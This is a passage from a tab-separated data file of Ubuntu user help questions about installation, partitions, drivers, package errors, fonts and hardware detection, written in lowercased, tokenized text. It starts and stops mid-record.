i 'm complety clueless how to solve this . im running ubuntu 12.04 server with apache2 . i hope someone can help me . regards jurre
386730	i was trying to install a font on ubuntu 12.04 and after the text displayed as boxes.can someone help me ?	i was trying to fix the problem in the game kerbal space program where no text displays , and after installing the `` microsoft core fonts '' and rebooting , the login only displayed white boxes instead of letters . i have been trying to reinstall the default fonts , but have been unsuccessful . can anyone help ?
386744	can i recover data from a corrupt partition ?	my system is a dual boot , windows 8 ( originally windows 7 , if it matters ) /ubuntu . the other day , i shrunk my windows partition , to extend my linux partition . it 's not the first time i 've done it , but it 's the first time i 've had any issues . i shrunk windows using easeus partition master , that went with no problem . i booted a live cd to extend my linux partition , it all seemed like it was working , then all of a sudden it froze . here 's where i think i messed up . i thought i had to restart my system . when it booted back up , i was met with the grub rescue command line , had no idea what i was doing , so i googled it . i ran the commands i found on google to try and boot my linux back up , did n't work . i booted into the live cd , and tried a grub repair . restarted my laptop once again , was met with a different grub screen ( grub version 1.99 ) . no clue what i was doing , tried the commands again- they kept telling me file not found , then that i needed to load a kernel . well , i tried changing the commands i used , and successfully booted into windows . i booted from the live cd again , and tried to mount the ubuntu partition . it was practically empty . there was only random system folders/files ( one was the initrd.img file or whatever , that i needed for grub booting- so not sure why it said the file was n't found ) but all my user data was gone . is there any way i can rescue my data ? or even my system maybe ? any help would be greatly appreciated , sorry for the verbose explanation .
386745	help installing linux w/ ubuntu onto a usb stick to boot from another computer from a linux machine	im tryng to boot my computer with linux w/ ubuntu through a usb stick/flash drive . i know how to do it from a windows computer but not from another linux machine ... help ?
386752	fixing corrupt backup gpt table ?	after successfully installing a dual boot environment , adding ubuntu 13.10 to a preinstalled windows 8 configuration i decided to increase the unallocated ssd disk space after reading about the benefits of overprovisioning . so , using minitools partition wizard in windows , i shrunk the ntfs windows partition somewhat . that seem to have completed successfully . however , when i boot up linux and launch gparted , it gives the following error message at startup : '' the backup gpt table is corrupt , but the primary appears ok , so that will be used . '' everything seems fine and dandy with the system , but i am worried that i will have a problem should the main gpt table become corrupt for some reason . i have used gdisk to backup the gpt table to a file , but is there a way to create a new backup gpt table ?
386757	actual name or pen-name for bzr whoami ?	i am setting up bazaar , and need to tell it my identity using whoami command . am confused as to whether i should provide my real name , or my online/pen name for the purpose ?
386759	ubuntu 12.04 window jitter	i 'm on ubuntu 12.04 , running the propriety nvidia drivers ( i have tried using the generic drivers ) . whenever i drag a window around it slowly redraws itself . any ideas on what to try ? system specs p4 2.6 ghz 2 gigs memory geforce 4 mx 20 video card
386761	gedit r plugin not working after upgrade to 13.10	i recently upgraded to 13.10 , and my r plugin for gedit is no longer working . when i go to gedit- > preferences- > plugins and try to enable `` r integration '' , i have little red error symbol and a message that says `` an error occured : plugin loader `` python '' was not found '' the contents of the rctrl.plugin file at user/lib/gedit/plugins is as follows : [ plugin ] loader=python module=rctrl iage=3 name=r integration description=allows r to be controlled from gedit authors=dan dediu < ddediu @ gmail.com > copyright=copyright âš 2009-2011 dan dediu < ddediu @ gmail.com > website=http : //sourceforge.net/projects/rgedit i did whereis python and then changed the loader=python line to read loader=path/to/python3.3 , which is what i found . i do n't know what to do at this point ; would appreciate help . edit : i have also tried downloading the tar.bz2 file from the developer 's webpage and extracting it into the plugins folder . still does n't work !
386762	trying to install no-ip , but getting error	i am trying to install noip dynamic update client on ubuntu server 13.04 . i am able to get through the auto config up to the point where it tries to create the debian package . here is the error log . dpkg-deb : building package `noip-2.1.9 ' in `/usr/local/src/noip-2.1.9-1/noip-2.1 .9_1-1_amd64.deb ' . dpkg-deb : unrecoverable fatal error , aborting : wait for subprocess gzip -9c failed : no child processes ( everything must be done via command line ) in response to a comment , i am calling the process by a few commands . apt-get install build-essential checkinstall cd /usr/local/src/ wget http : //www.no-ip.com/client/linux/noip-duc-linux.tar.gz tar xf noip-duc-linux.tar.gz dir cd noip-2.1.9-1/ checkinstall i am using this as a guide
386764	file triggers record mentions illegal package name	im having problem installing and removing programs . i get the following error dpkg : file triggers record mentions illegal package name `install-info/noawait ' ( for interest in file `/usr/share/info ' ) : character `/ ' not allowed ( only letters , digits and characters `-+._ ' ) e : sub-process /usr/bin/dpkg returned an error code ( 2 ) i cant find the package install-info/noawait anywhere .
386765	how customize ubuntu installation	how can i customize ubuntu installation ? i do n't want install libre office or other app . i need something like ubuntu server but without server tools .
386772	may i have help with getting my ubuntu-installed usb stick to recognise at all ?	i am having a toshiba satellite with win8 , if that matters . i used uui to download 64-bit plain old ubuntu onto an `` 8 '' gb sandisk cruzer . it says success . i shut off computer thrice , the first time i mash esc , the second f12 and the third f8 . not once is startup different from usual at all . how to fix this ? linux in general is not my strong suit , so please do n't criticize me for making an obvious mistake . any help would be appreciated .
386775	upgrading ubuntu to version 13.10 hangs	i 'm upgrading from 13.04 to 13.10 and the installation is hanging what steps can i take to rollback the upgrade ? is it safe to shut down my machine ?
386777	lafalink lf-d10 wlan driver install	i am new to ubuntu server and have installed it on a proliant g4 . this is the new version , 14.04 . i have my system installed and it seems to be doing fine but it has not installed the driver for my wireless usb adapter . i am using the lafalink lf-d10 . the chipset shows up as being rt3070 . i have the driver on an install cd . the driver is 2011_0719_rt3070_rt3370_rt5370_rt5372_linux_sta_v2.5.0.3_dpo . it does show wlan0 during setup but when i try to let it automatically configure itself it gives an error and the correct device does not show up in the list anyway . it shows 2 wire something or other . my question is how do i get this on the server and set it up ? i do not have internet access to my server and i also do not have a wired network set up . i can use either a cd or usb port but i do not know how to do this . can anyone tell me how to do this ? i have seen many other people making wireless lan 's using this same chip setup but they were all hooked up to the internet with their servers and did not have to do this my way . how can i manually get this to work ? i have been waiting for months for this new ubuntu release but it does not work either . i would appreciate any help that i can get to get my server set up for wireless use .
386779	using daemon tools to install from within ubuntu trial	i 've got a 1 year old toshiba laptop running windows 8 ( blah ) . i have partition my hard drive to allow for 100gb of space for ubuntu -- uefi is turned off . while going through the install everything goes alright until the installer reaches about 50 % or so , at which point i receive a disk error message . i tried booting from the disk again and performed a check of the install cd i burned to make sure it was error free . there 's one error on the disk , and unfortunately it 's the last one i have and it is n't rw . i can select the 'try ubuntu ' option and successfully reach the desktop , the install does n't work from there either , even while connected to the internet . i have the ubuntu iso 13.10 saved on a flash drive , also on that flash drive is a copy of daemon tools . is it at all possible to use dt to run the iso file from within the ubuntu 'trial ' boot ? if not i 'll stop being a lazy cheapskate and go buy another pack of dvd 's and burn again on a slower speed .
386781	how to build latest gnome apps ( music , photos etc ) from source ?	i 've been reading for a while your answers but now the time came to ask mine . i tried several linux distros and i ended up with a customized saucy to run on gnome 3.10 . though ricotz has compiled many packages there are some not updated yet such as gnome-music , gnome-photos , gnome-maps , gnome-software . my question is how could i compile themes from source since i downloaded the files . i tried the regular ./configure , make etc stuff but it did n't work i also searched the web and i found some scripts and resources but for building the whole gnome-shell . any help ?
386786	recover encrypted folder content after format	so i made a backup of my home folder before i formatted my computer . now i am trying to access the files in my encrypted private folder but with no luck . what are the commands that i should run in this case ? should i copy paste it to my current home first ? i read about ecryptfs-recover-private is that what i ' m looking for ? i really do n't want to loose this information
386792	how do i install software on kubuntu ?	my friend was given a laptop with kubuntu installed on it . she loved it and she planted that love in me too . i quickly downloaded kubuntu 13.10 , but i noticed my screen flashes after installation . i removed it and installed 12.04 . it 's working perfectly , but i do n't know how to install programs such vlc and others in ubuntu . also , my mp3 and video player is not working . i 'm a new user . please help me to get started using ubuntu .
386793	how ssh access to the ubuntu container via usb in windows computer ?	experts i have installed ubuntu touch in galaxy nexus , it runs well . following the `` accessing the device over ssh '' instruction , i can ssh access to ubuntu via wireless and via usb in linux computer . but i ca n't ssh to ubuntu via usb in windows pc . how to configure that ? connection error is `` the remote system refused the connection '' i tried to connect via port 22 and port 8888 , same error . according to /etc/hosts file , i found there is an ip 127.0.1.1 for hostname , i tried that ip , but also does n't work . what 's the problem , how to configure that ? thanks for your help .
386798	how to reinstall ubuntu without losing data	i was trying to upgrade ubuntu but it crashed , so i ca n't acces it anymore . i have it alongside windows but i need to reinstall it . the options i get from a bootable usb are : erase ubuntu and reinstall erase everything and reinstall something else i do n't want to lose the data i have in both operative systems , i 'm guessing i have to select something else and manually set the partitions . when i first installed ubuntu i created a home folder apart from the bootable partition , which has all the data i want to preserve . so after this long introduction my question is : if i set the partitions exactly as they were before would i lose the info i have ? since i have n't chosen to format any partitions i 'm guesing no , but could anyone please confirm this . thank you david p .
386799	how to setup a system for easy reinstall , savety , easy handling with full disk enryption ?	4tb drive , lots of data , not all of it will be backuped later but is still important . i like to be able to reinstall ubuntu over it without losing the data . should i have 2 partitions inside one encrypted lvm swap + everything else ? should i have 3 partitions inside one encrypted lvm swap + root + /home ? should i have two seperate luks partition one with swap + root and other one with the data ( possibly home ) ? would ask me for two passwords on boot if i not setup some keyfile thing but not a fan of the idea . but having data seperated in a actually real different partition might be saver and has benefits ? i installed rencently from the mini.iso and the giuded partitioning created a 1 mb partition before /boot that was cooled `` bios boot '' or something like that also on another place there was grub mentioned together with it i think . what is this partiton ? how would i create such a partition when i manually partiton everything ? does this have something to do with uefi boot ( my pc not has this ) or this gtp partition table that is needed for huge drives ? because i did this before and never saw such a 1mb partitition . i an also not sure if i should really actaully use /home as my data partition or just use a seperate one and maybe symlink stuff or setup the ~/music ~/video folders to another partition . well and the main question how to actually reinstall into existing luks partitions ? i saw some tuts , they are outdated , i not fully trust them or they just sound like a bit or a pain in the butt . if i undertand it right you cant just tell the installer to install there and then it works . so is there a easy + save way to do it ? // i just finished trying reinstall over manual setup of a luks lvm and the install fails on trying to write grub to mbr .
386800	dual boot ubuntu 13.10 & windows 8.1	i have windows 8.1 and i tried to dual boot ubuntu 13.10 with a usb drive . the installation seemed to work fine ( i installed ubuntu on my third hard drive ) . now how do i boot to ubuntu ?
386803	dialogue windows look wrong after upgrade	i recently upgraded to 13.10 , and i 'm noticing that nearly all of the dialog windows look like they 're from 1999 . the trim looks right , but the buttons and everything else just look wrong . help me get back to the future ...
386806	when using a hauppauge hd pvr with mythbuntu 12.04.3 what devices do you pick in mythbuntu control panel for remote and ir transmitter ?	ok , i am not new to mythtv or hauppauge cards but i am new to both mythbuntu and the hauppauge hd-pvr . i just need to know what to choose in mythbuntu control panel to use the ir receiver and the ir transmitter on the hd-pvr . thanks in advance for your help .
386808	slow steam downloads in ubuntu	downloads in steam are super slow , often less than 1kb/sec . i know that this is not due to poor steam server location or poor internet connection , as it downloads fine on windows . i am using wubi .
386809	dreamweaver cs3	can dreamweaver cs3 be loaded into ubuntu 12.04.3. with amd phenom 9150e quad-core processor when trying to load the cd it says `` an error occurred while loading the archive ''
386810	is there a way to overclock the amd a4-3320m apu ?	i have an hp pavillion g6 with the amd a4-3320m apu . the bios wo n't allow overclocking to 2.6 ghz . i can overclock in windows using catalyst control center , but not in saucy .
386812	installing xubuntu over ubuntu ( dual boot with windows )	i currently have ubuntu 13.10 installed dual-boot with windows 7 . i want to install xubuntu 13.10 over ubuntu 13.10 without messing up with windows and without losing my data in ubuntu so : is there a way to install xubuntu over ubuntu and keep all my data and all my programs ? or do i have to uninstall ubuntu ( and lose all my data ) and then install xubuntu ?
386814	ubuntu os on hp mini 1030nr wireless card not working	i had previously installed a earlier version of ubuntu on this computer and everything was working great until i messed with a setting and had to reinstall windows for a bit . all drivers were working . i recently reinstalled ubuntu 's long term service v13 . during the `` try before install '' the netbooks wifi was deactivated but i was able to turn it on in settings without an internet connection . after the full install ( destroying windows ) , i have not been able to get the wifi to turn on . unable to connect to wifi , i have not been able to see if any updates would fix this issue . has anyone come across this before ? would a direct cable and updates even fix the issue ? i am a new user to ubuntu , this netbook if for my parents .
386816	how to fix compiz after killing the process	i just killed the compiz process by accident with : kill pid ( compiz ) and now i am unable to have the optimal dual-screen with my laptop ( running ubuntu 12.04 lts ) and my monitor that i was running when moments ago i could . i 've tried rebooting , unity -- reset but that ends up getting halted on setting update `` run_key '' followings also did n't worked : compiz -- replace and sudo apt-get install compiz compizconfig-settings-manager compiz-fusion-plugins-extra compiz-fusion-plugins-main compiz-plugins and a couple of other solutions that have been posted but nothing has worked yet . how to solve this ?
386817	is ubuntu 13.10 compatible with razor nostromo or logitech g13 for gaming ?	ok so i am interested to buy a razor nostromo or logitech g13 , but i do n't know if ubuntu 13.10 is offering some support for this devices . in my case i don`t want to go back to windows for one game as i am a linux user . i 'm asking for your help , if i buy this device , can i still play my favourite game or not ? thanx and i will look forward for your advice .
386819	how do i install printer samsung ml -- 1865 with ubuntu 12.04 ?	how do i install printer samsung ml-1865 with ubuntu 12.04 ? i have tried to use add printer , but it doesnt work . it comes up with driver 1860 then recommends 1750 after searching not 1865 and test print doesnt work ( internal error . please use the proper driver ) . i have the original installation disk and nothing happens when i put it in the computer or click on any of the setup files . thanks
386821	realtek 8169/8 blues	i have been banging my head against this problem for 2 days and i ca n't get it solved . i have a msi z87 gd55 board with a realtek modem for the ethernet and i ca n't get it to work . i have tried xubuntu and lubuntu and nothing . i have tried changing the interfaces file to use dhcp and that did n't work . i tried to load the 8168 drivers from realtek and i ca n't get stopped at ./autorun.sh because it `` does n't recognize make '' i ran through all of this : unable to connect to wired dhcp connection via my pc ? my link actually is link=yes , so i do n't know what is wrong . and i ca n't post any code over here because it wo n't recognize either of my usb wifi modems . help
386822	remove openjdk-7-jre but apt-get requires to install openjdk-6-jre , etc	i installed openjdk-7-jre and icedtea-7-plugin to use webex in firefox in ubuntu 12.04 yesterday . now i do n't have to use jre so i remove it . but the apt-get says that it will install openjdk-6-jre and a bunch of stuff like this : $ sudo apt-get autoremove -- purge openjdk-7-jre icedtea-7-plugin reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : default-jre default-jre-headless icedtea-6-jre-cacao icedtea-6-jre-jamvm openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib suggested packages : icedtea-plugin sun-java6-fonts fonts-ipafont-gothic fonts-ipafont-mincho ttf-telugu-fonts ttf-oriya-fonts ttf-kannada-fonts ttf-bengali-fonts the following packages will be removed : icedtea-7-plugin* openjdk-7-jre* python-renderpm* python-reportlab* python-reportlab-accel* the following new packages will be installed : default-jre default-jre-headless icedtea-6-jre-cacao icedtea-6-jre-jamvm openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib 0 upgraded , 7 newly installed , 5 to remove and 5 not upgraded . need to get 33.1 mb of archives . after this operation , 86.0 mb of additional disk space will be used . do you want to continue [ y/n ] ? i do n't use jre anymore so how could i remove jre7 completely without to install jre6 ?
386824	dvd audio playback silent - how to find codec	i 'm utterly baffled by this but i 'm sure the fix must be simple - i can play dvds fine on my ubuntu machine but i have just bought a new dvd and there is no sound . the sound works on all other dvds i 've played and normal avi files also work , music works fine . so i think it must be a coded missing but i have no idea how to narrow it down . can someone help ? for reference i have libdvdcss2 , libdvdnav4 , restricted-extras installed . i have tried vlc , mplayer and parole with no success . any help to determine the missing codec would be really appreciated . example mplayer output for working dvd : playing dvd : // . libdvdread : using libdvdcss version 1.2.12 for dvd access there are 39 titles on this dvd . there are 1 angles in this dvd title . libdvdread : attempting to retrieve all css keys libdvdread : this can take a long time , please be patient ... .. audio stream : 0 format : ac3 ( stereo ) language : aid : 128. number of audio channels on disk : 1. number of subtitles on disk : 0 detected file format : mpeg-ps video : mpeg2 720x576 ( aspect 3 ) 25.000 fps 7000.0 kbps ( 875.0 kbyte/s ) ========================================================================== opening video decoder : [ ffmpeg ] ffmpeg 's libavcodec codec family asking decoder to use 2 threads if supported . selected video codec : [ ffmpeg2 ] vfm : ffmpeg ( ffmpeg mpeg-2 ) ========================================================================== ========================================================================== opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders audio : 48000 hz , 2 ch , s16le , 192.0 kbit/12.50 % ( ratio : 24000- > 192000 ) selected audio codec : [ ffac3 ] afm : ffmpeg ( ffmpeg ac-3 ) > ========================================================================== for the non-working dvd : playing dvd : // . libdvdread : using libdvdcss version 1.2.12 for dvd access there are 9 titles on this dvd . there are 1 angles in this dvd title . libdvdread : attempting to retrieve all css keys libdvdread : this can take a long time , please be patient libdvdread : get key for /video_ts/video_ts.vob at 0x0000011f libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_0.vob at 0x0000015c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_1.vob at 0x00000236 libdvdread : elapsed time 0 libdvdread : found 1 vts's libdvdread : elapsed time 0 number of audio channels on disk : 0. subtitle ( sid ) : 0 language : en subtitle ( sid ) : 1 language : ja number of subtitles on disk : 2 detected file format : mpeg-ps too many video packets in the buffer : ( 4096 in 8256891 bytes ) . maybe you are playing a non-interleaved stream/file or the codec failed ? for avi files , try to force non-interleaved mode with the -ni option . mpeg : no audio stream found - > no sound . video : mpeg2 720x480 ( aspect 3 ) 29.970 fps 9800.0 kbps ( 1225.0 kbyte/s ) ========================================================================== opening video decoder : [ ffmpeg ] ffmpeg 's libavcodec codec family asking decoder to use 2 threads if supported . selected video codec : [ ffmpeg2 ] vfm : ffmpeg ( ffmpeg mpeg-2 ) ========================================================================== audio : no sound starting playback ...
386825	can not update in ubuntu 13.10	when want to update in ubuntu 13.10 i get this error : how i update now ?
386828	installation solution needed	my old dell was a speed demon back in the days of xp , but it has no dvd drive , no floppy and will not boot from usb . is there another way to install ubuntu or shall i gut the dell and use the case as a flower pot ?
386829	ugly fonts in firefox with infinality	i recently installed truetype-infinality and infinality-fontconfig on my xubuntu and set the rendering style to osx . while my terminal and system fonts looks great , fonts on certain webpages look hideous in firefox . for example , these google search results and the section headers on wikipedia . anyone know what is causing this or how to fix it ?
386832	video driver reinstall	i removed my video card driver and now ubuntu goes to low graphics mode but nothing works . my video driver is a *82865g integrated graphics controller * i have tried sudo apt-get install mesa-utils it installed but i still get the low graphics mode popup and ca n't do anything else still . if anyone knows what i need to do so i can fix ubuntu would be great .
386834	ubuntu 12.04.3 lts kernal to 3.12	i am running ubuntu 12.04.3 lts and have upgraded the kernel to 3.12 . do i need to modify my repositories ? also on a previous install of 12.04 with the 3.12 kernel i encountered and error with the graphics driver . i am using an asus ul80vt and figured i would just end up installing bumble bee again , but it this no longer idea/ possible with the new kernel ?
386835	cinnamon icons do n't appear	i installed cinnamon on ubuntu 12.04 and the menu icons do not appear , as well aprox . half of all icons do not appear .
386837	install ubuntu on hp envy dv6-7305se	i got a new hp laptop envy dv6-7305se and windows 8.1 installed , sandesk ssd and switchable graphic cards ( intel & nvidia geforce gt 635m ) . i need to install ubuntu on it so i need some help with the following points : which recommended ( stable ) version to install for this device ? 12.04 lte or 13.04 ? what to do for dual boot with windows 8.1 ? how to switch between both graphic cards ? thanks for your help and time
386838	windows installer for ubuntu desktop on windows 8 64 bit	i installed ubuntu 12.04 lts on my windows 8 64 bit laptop , and i am wondering if when i start ubuntu does it at all use windows 8 to run ? i am new to linux and an looking for an alternative to win 8 . even though the warning states that installing ubuntu via the windows installer is not supported in win 8 , it does work . i have had some issues installing google chrome , but aside from that no issue . thank you in advance for the assistance . btw - since my work uses win 7 , i feel i will always be a slave to it , but if it works great , then i am thinking of reformatting my hdd and giving the lion share of my ssd to ubuntu .
386840	why wo n't my wireless work on ubuntu 13.10 ?	i have a dell latitude d630 with a broadcom wireless 1390 wlan mini-card that is n't working . before you ask , yes i went to additional drivers under the softwares and packages app and yes i activated it but it still does n't work . i can only use the internet if i am directly connected to my router , can someone please help ? i find this to be variously frustrating just because i do n't get why it has to be so complicated to get a wifi chip to work .
386843	qt 4 update to qt 5 .1	i have qt creator 4 . i 'm wanting to update it to qt 5.1 on ubuntu 13.10 . is there a simple way to do this in the terminal ?
386844	is it possible to dual boot windows 7 and ubuntu server ? if so , is it better to use two separate hard drives or a single hard drive ?	i currently am running windows 7 on one hard drive partition with 87 gb there is 23 gb left on that hard drive . i have a second 160 gb hard drive full of data . i want to turn this into a home server for mostly media files . any suggestions on what the best os is to use and how to partition the hard drives ?
386847	trouble in dpkg says no space left on device	`` e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem. '' then it say no space left on device , and when ever i try another thing , it return same problem
386850	how to get apt to work with and without proxy ?	i sometimes work behind proxy ( when connected via vpn ) and sometimes without proxy . i find that every time i switch i have to edit /etc/apt/apt.conf to remove or restore this particular line acquire : :http : :proxy `` http : //proxy.company.com:80 '' ; is there any way i can make apt work flexibly with and without proxy using single configuration ?
386851	uninstall gnome 3.10 completly from ubuntu 13.10	when i installed gnome 3.10 on my ubuntu 13.10 system , there was problem with my gui . after installing gnome there are other problems as well . if you have any idea how to uninstall gnome completely , and any idea on how to make ubuntu 13.10 go back to a fresh installation state , then please help me . even after i have uninstalled gnome , the problems persist . i want to say thanks in advance !
386853	installing ubuntu with windows 7 on toshiba p50 - black screen	i know this problem has been posted before but none of the possible solutions i found worked for me . i just bought a toshiba satellite p50-a-11l laptop , reformated hdd , got rid of god-awful windows 8 and installed windows 7 ultimate 64-bit . when i try to install ubuntu from liveusb , i get black screen as soon as i choose `` install ubuntu inside windows '' and want to proceed . sometimes , insted of just hanging on black screen , it reboots straight back to windows . other details : i installed windows 7 in legacy mode , not uefi mode as in uefi mode it refused to recognise any usb or dvd as bootable ( even with safe boot and fast boot disabled ) . this happens with any ubuntu version ( 12.04 , 13.04 , 13.10 ) . also with 13.10 version it does not even load ubuntu from usb , just stuck on screen with `` ubuntu '' and progress bar . downloaded images were checked and after that the installation on usb stick was checked by ubuntu . so it 's not an image problem . even tried just for the heck of it installing from the same sticks on my old laptop and everything worked fine . i tried creating usb sticks with different software ( livelinux usb creator , uui , yumi ) - same result . as i am booting in legacy mode , i used boot-repair first in order to make ubuntu see that i have windows installed . what i tried : disabling the in-built lan ( do n't have nic in my bios ) . that actually only caused liveusb not to boot at all , ending in `` divide error : 0000 [ # 1 ] smp '' and quoting various nouveau errors . changing boot mode in grub to `` osi=linux acpi_backlight=vendor '' and after that to `` nomodeset '' . did n't work either . and i ran into another error while trying to update grub : /user/sbin/grub-probe : error : failed to get canonical path of /cow ' . tried to fix that though boot_repair but could n't as grub options are grayed out and not accessible there . tried a simple solution mentioned by someone of just increasing screen brightness using function key when the screen goes black . did not find any other possible solutions . i am not most advanced linux , user so maybe i 'm missing something obvious here ? any help would be appreciated : )
386856	how to unistall ubuntu ?	i have a gateway laptop and i installed ubuntu 13.10 , and i want to revert back to windows . i did n't do the dual boot option , just to let you know . can anyone help me out ?
386859	how do i use the gtk+ development libraries in ubuntu ?	i 've been programming for about a year and a half on windows and i 've just started getting used to the way things work on that platform , but now i 'm interested in development on linux and i 've been having a tough time getting used to the workflow , lack of ide , and command line compilation with gcc . i 'm running xubuntu 13.10 64bit , by the way.. to test the waters , i did what many people do and wrote a quick c++ 'hello world ' program . # include < iostream > int main ( ) { std : :cout < < `` hello ! \n '' ; return 0 ; } my first issue is ; this program seems to get a compilation error when i try to compile it using gcc , but it compiles fine when i use the g++ compiler : gcc hello.cpp -o hello /tmp/ccbmumzf.o : in function `main ' : hello.cpp : ( .text+0xa ) : undefined reference to `std : :cout' hello.cpp : ( .text+0xf ) : undefined reference to `std : :basic_ostream < char , std : :char_traits < char > > & std : :operator < < < std : :char_traits < char > > ( std : :basic_ostream < char , std : :char_traits < char > > & , char const* ) ' /tmp/ccbmumzf.o : in function `__static_initialization_and_destruction_0 ( int , int ) ' : hello.cpp : ( .text+0x3d ) : undefined reference to `std : :ios_base : :init : :init ( ) ' hello.cpp : ( .text+0x4c ) : undefined reference to `std : :ios_base : :init : :~init ( ) ' collect2 : error : ld returned 1 exit status what 's going on here , is gcc failing to recognize that my code is c++ or something ? my second issue is with trying to use libraries : i was under the impression that the gtk+3.0 development libraries come included with ( x ) ubuntu , but when i try to follow the simple tutorial here , i get the following error from g++ : g++ hello.cpp -o hello hello.cpp:1:21 : fatal error : gtk/gtk.h : no such file or directory # include < gtk/gtk.h > ^ compilation terminated . so then , i interpreted that to mean that the libraries for gtk+3.0 are n't installed.. so i checked apt-get , and i did n't really see anything that looked like what i needed.. do i have to build gtk+3.0 from source , or is there some ppa somewhere that i need ? ? these issues are really frustrating to me.. i know that a lot of people swear by the gnu/linux development workflow , but as someone who is used to working in visual studio , i 'm finding the process to be somewhat opaque and unintuitive . right now i 'm using mousepad on xubuntu to edit my code , and while it has color-coded syntax , it seems to do very little beyond that . i know that eventually i 'll have to deal with multiple files and creating makefiles and , at this point , i 'm dreading it ! whatever help you can give to a novice programmer and total linux/gnu noob is very welcome !
386862	alternatives to leopard flower	on windows i usually setup my firewall to block all network access to programs i do n't feel need internet access . the only similar program i 've been able to find for ubuntu is leopard flower , but it seems to be a rather unheard of project and so i 'm hesitant to start using it , and i 'm wondering if there is perhaps something more common that has similar features . i would like to be able to block operating system components , and regular software from accessing the network ( send/receive ) , as well as block individual ips on a per program basis .
386865	ubuntu 13.10 freezing when dragging window to expand full size from half screen ?	lately i 've found a greater need to have one window/program on the left half and another on the right , however when dragging to expand one window full screen it often results in a crash where the mouse moves ( stuck on the hand symbol ) , but is unresponsive to clicks . luckily the keyboard still responds to some commands and i 've been able to ctrl+alt+f1 to reboot from there , or use the reisub thing . i would happily use the top left maximise button , but this usually results in the desired window locking to centre but still half sized . also , dragging to maximise does n't always result in a crash , sometimes it 'll be the tenth time i do it , sometimes the first or second . any ideas what could be causing this ? or any way i can stop this happening ( apart from not using the feature , obviously ) ?
386867	64-bit installation of ubuntu does n't recognize more than 2.9gb of ram	my bios recognizes 4gb , ubuntu 13.10 only sees 2.9gb . i 'm running an asrock fm2a75 pro4-m motherboard , 4gb of some generic ram , and an amd a6-5400k . i 've updated to kernel 3.12.3 , no change . the output of uname-m x86_64 output of free -m total used free shared buffers cached mem : 2962 1159 1803 0 28 318 -/+ buffers/cache : 812 2150 swap : 3905 0 3905 output of sudo lshw description : desktop computer product : to be filled by o.e.m . ( to be filled by o.e.m . ) vendor : to be filled by o.e.m . version : to be filled by o.e.m . serial : to be filled by o.e.m . width : 64 bits capabilities : smbios-2.7 dmi-2.7 vsyscall32 configuration : boot=normal chassis=desktop family=to be filled by o.e.m . sku=to be filled by o.e.m . uuid=00020003-0004-0005-0006-000700080009 *-core description : motherboard product : fm2a75 pro4-m vendor : asrock physical id : 0 serial : e80-2b019800452 *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : p1.80 date : 11/02/2012 size : 64kib capacity : 8128kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb biosbootspecification uefi *-memory description : system memory physical id : 9 slot : system board or motherboard size : 4gib *-bank:0 description : dimm ddr3 synchronous 667 mhz ( 1.5 ns ) product : ebj21ue8bdf0-dj-f vendor : elpida physical id : 0 serial : e0973a4a slot : a1_dimm0 size : 2gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:1 description : dimm [ empty ] product : array1_partnumber1 vendor : a1_manufacturer1 physical id : 1 serial : a1_sernum1 slot : a1_dimm1 *-bank:2 description : dimm ddr3 synchronous 667 mhz ( 1.5 ns ) product : ebj20uf8bcf0-dj-f vendor : elpida physical id : 2 serial : e037024f slot : a1_dimm2 size : 2gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:3 description : dimm [ empty ] product : array1_partnumber3 vendor : a1_manufacturer3 physical id : 3 serial : a1_sernum3 slot : a1_dimm3 *-cache:0 description : l1 cache physical id : 14 slot : l1 cache size : 96kib capacity : 96kib clock : 1ghz ( 1.0ns ) capabilities : pipeline-burst internal write-back unified *-cache:1 description : l2 cache physical id : 15 slot : l2 cache size : 1mib capacity : 1mib clock : 1ghz ( 1.0ns ) capabilities : pipeline-burst internal write-back unified *-cpu description : cpu product : amd a6-5400k apu with radeon ( tm ) hd graphics vendor : advanced micro devices [ amd ] physical id : 1f bus info : cpu @ 0 version : amd a6-5400k apu with radeon ( tm ) hd graphics slot : cpusocket size : 2400mhz capacity : 3600mhz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold bmi1 cpufreq configuration : cores=2 enabledcores=2 threads=2 *-pci:0 description : host bridge product : family 15h ( models 10h-1fh ) processor root complex vendor : advanced micro devices , inc. [ amd ] physical id : 100 bus info : pci @ 0000:00:00.0 version : 00 width : 32 bits clock : 66mhz *-pci:0 description : pci bridge product : family 15h ( models 10h-1fh ) processor root port vendor : advanced micro devices , inc. [ amd ] physical id : 2 bus info : pci @ 0000:00:02.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci pm pciexpress msi ht normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:18 ioport : e000 ( size=4096 ) memory : fd000000-fe0fffff ioport : c0000000 ( size=301989888 ) *-display description : vga compatible controller product : gk107 [ geforce gtx 650 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:18 memory : fd000000-fdffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport : e000 ( size=128 ) memory : fe000000-fe07ffff *-multimedia description : audio device product : gk107 hdmi audio controller vendor : nvidia corporation physical id : 0.1 bus info : pci @ 0000:01:00.1 version : a1 width : 